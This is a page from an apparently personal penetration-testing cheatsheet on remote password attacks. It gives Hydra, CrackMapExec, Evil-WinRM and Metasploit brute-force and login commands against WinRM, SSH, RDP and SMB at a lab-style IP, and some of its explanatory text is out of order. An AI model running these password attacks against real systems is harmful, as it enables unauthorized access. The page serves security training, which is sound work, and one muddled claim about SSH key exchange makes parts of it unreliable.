📒
My Pentesting Cheatsheet
  • Home
  • Commands Only Summary
    • Some other cool websites
  • Preparation
    • Documents
    • Contract - Checklist
    • Rules of Engagement - Checklist
    • Contractors Agreement - Checklist for Physical Assessments
  • Information Gathering
  • Vulnerability Assessment
  • Pentesting Machine
  • Enumeration
    • NMAP Scan types explained
    • Firewall and IDS/IPS Evasion
  • Footprinting
    • Google Dorks
    • Samba (smb)
    • NFS
    • DNS
    • SMTP
    • IMAP/POP3
    • SNMP
    • MySQL
    • MSSQL
    • Oracle TNS
    • IPMI
    • SSH
    • RDP
    • WinRM
  • Web Information Gathering
    • Whois
    • DNS & Subdomains
    • Fingerprinting
    • Crawlers
    • Search Engine Discovery
    • Automating Recon
  • Vulnerability Assessment
  • File Transfers
    • Windows Target
    • Linux Target
    • Transferring Files with Code
    • Miscellaneous File Transfer Methods
    • Protected Files Transfer
    • Catching Files over HTTP/S (Nginx)
    • Living Off The Land
    • Evading Detection
  • Shells & Payloads
    • Reverse Shells + Bind + Web
  • Password Attacks
    • John the ripper
    • Remote password attacks
    • Password mutations
    • Password Reuse / Default Passwords
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Cracking Files
  • Attacking Common Services
    • FTP
    • SMB
    • SQL
    • RDP
    • DNS
    • Email Services
  • Pivoting, Tunneling, and Port Forwarding
    • Choosing The Dig Site & Starting Our Tunnels
    • Playing Pong with Socat
    • Pivoting Around Obstacles
    • Branching Out Our Tunnels
    • Double Pivots
    • Final considerations
  • Active Directory Enumeration & Attacks
    • Initial Enumeration
    • Sniffing out a Foothold
    • Sighting In, Hunting For A User
    • Spray Responsibly
    • Deeper Down the Rabbit Hole
    • Kerberoasting - Cooking with Fire
    • Access Control List (ACL)
    • Advanced Privilege Escalation in Active Directory: Stacking The Deck
    • Domain trusts
    • Domain Trusts - Cross Forest
    • Defensive Considerations
  • Using Web Proxies
  • Login Brute Forcing
  • SQL Injection Fundamentals
    • Mitigating SQL Injection
  • SQLMap Essentials
    • Building Attacks
    • Database Enumeration
    • Advanced SQLMap Usage
  • Cross-Site Scripting (XSS)
    • Prevention
  • File Inclusion
  • File Upload Attacks
    • Basic Exploitation
    • Bypassing Filters
    • Other Upload Attacks
    • Prevention
  • Command Injections
    • Exploitation
    • Filter Evasion
  • Web Attacks
    • HTTP Verb Tampering
    • Insecure Direct Object References (IDOR)
    • XML External Entity (XXE) Injection
    • GraphQL
  • Attacking Common Applications
    • Application Discovery & Enumeration
    • Content Management Systems (CMS)
    • Servlet Containers/Software Development
    • Infrastructure/Network Monitoring Tools
    • Customer Service Mgmt & Configuration Management
    • Common Gateway Interfaces
    • Thick Client Applications
    • Miscellaneous Applications
  • Privilege Escalation
    • Linux Privilege Escalation
      • Information Gathering
      • Environment-based Privilege Escalation
      • Service-based Privilege Escalation
      • Linux Internals-based Privilege Escalation
      • Recent 0-Days
      • Linux Hardening
    • Windows Privilege Escalation
      • Getting the Lay of the Land
      • Windows User Privileges
      • Windows Group Privileges
      • Attacking the OS
      • Credential Theft
      • Restricted Environments
      • Additional Techniques
      • Dealing with End of Life Systems
      • Windows Hardening
    • Windows (old page)
  • Documentation & Reporting
    • Preparation
    • Reporting
  • Attacking Enterprise Networks
    • Pre-Engagement
    • External Testing
    • Internal Testing
    • Lateral Movement & Privilege Escalation
    • Wrapping Up
  • Deobfuscation
  • Metasploit
    • msfvenom
  • Custom compiled files
  • XSS
  • Azure AD (Entra ID)
Powered by GitBook
On this page
  • Network services
  • WinRM
  • SSH
  • Remote Desktop Protocol (RDP)
  • SMB
  1. Password Attacks

Remote password attacks

PreviousJohn the ripperNextPassword mutations

Last updated 6 months ago

Network services

WinRM

(WinRM) is the Microsoft implementation of the network protocol (WS-Management). It is a network protocol based on XML web services using the (SOAP) used for remote management of Windows systems. It takes care of the communication between (WBEM) and the (WMI), which can call the (DCOM).

However, for security reasons, WinRM must be activated and configured manually in Windows 10. Therefore, it depends heavily on the environment security in a domain or local network where we want to use WinRM. In most cases, one uses certificates or only specific authentication mechanisms to increase its security. WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS).

A handy tool that we can use for our password attacks is , which can also be used for other protocols such as SMB, LDAP, MSSQL, and others. We recommend reading the for this tool to become familiar with it.

Another handy tool that we can use to communicate with the WinRM service is , which allows us to communicate with the WinRM service efficiently.

CrackMapExec

crackmapexec -h
crackmapexec smb -h
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

Evil-WinRM

Install: sudo gem install evil-winrm

evil-winrm -i <target-IP> -u <username> -p <password>

SSH

The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptography operations/methods: symmetric encryption, asymmetric encryption, and hashing.

Symmetric Encryption

Asymmetrical Encryption

Asymmetric encryption uses two SSH keys: a private key and a public key. The private key must remain secret because only it can decrypt the messages that have been encrypted with the public key. If an attacker obtains the private key, which is often not password protected, he will be able to log in to the system without credentials. Once a connection is established, the server uses the public key for initialization and authentication. If the client can decrypt the message, it has the private key, and the SSH session can begin.

Hashing

The hashing method converts the transmitted data into another unique value. SSH uses hashing to confirm the authenticity of messages. This is a mathematical algorithm that only works in one direction.

Hydra - SSH

hydra -L user.list -P password.list ssh://10.129.42.197

Remote Desktop Protocol (RDP)

Hydra - RDP

We can also use Hydra to perform RDP bruteforcing.

hydra -L user.list -P password.list rdp://10.129.42.197
xfreerdp /v:<target-IP> /u:<username> /p:<password>

SMB

hydra -L user.list -P password.list smb://10.129.42.197

old Hydra might not support SMBv3, metasploit:

use auxiliary/scanner/smb/smb_login
set user_file username.list
set pass_file password.list
set rhosts 10.129.42.197
run

CrackMapExec can list shares

crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

and Smbclient can interact

smbclient -U user \\\\10.129.42.197\\SHARENAME

Symmetric encryption uses the same key for encryption and decryption. However, anyone who has access to the key could also access the transmitted data. Therefore, a key exchange procedure is needed for secure symmetric encryption. The key exchange method is used for this purpose. If a third party obtains the key, it cannot decrypt the messages because the key exchange method is unknown. However, this is used by the server and client to determine the secret key needed to access the data. Many different variants of the symmetrical cipher system can be used, such as AES, Blowfish, 3DES, etc.

We can use a tool such as Hydra to brute force SSH. This is covered in-depth in the module.

Microsoft's (RDP) is a network protocol that allows remote access to Windows systems via TCP port 3389 by default.

Linux offers different clients to communicate with the desired server using the RDP protocol. These include , , , and many others. For our purposes, we will work with xfreerdp.

Windows Remote Management
Web Services Management Protocol
Simple Object Access Protocol
Web-Based Enterprise Management
Windows Management Instrumentation
Distributed Component Object Model
CrackMapExec
official documentation
Evil-WinRM
Diffie-Hellman
Login Brute Forcing
Remote Desktop Protocol
Remmina
rdesktop
xfreerdp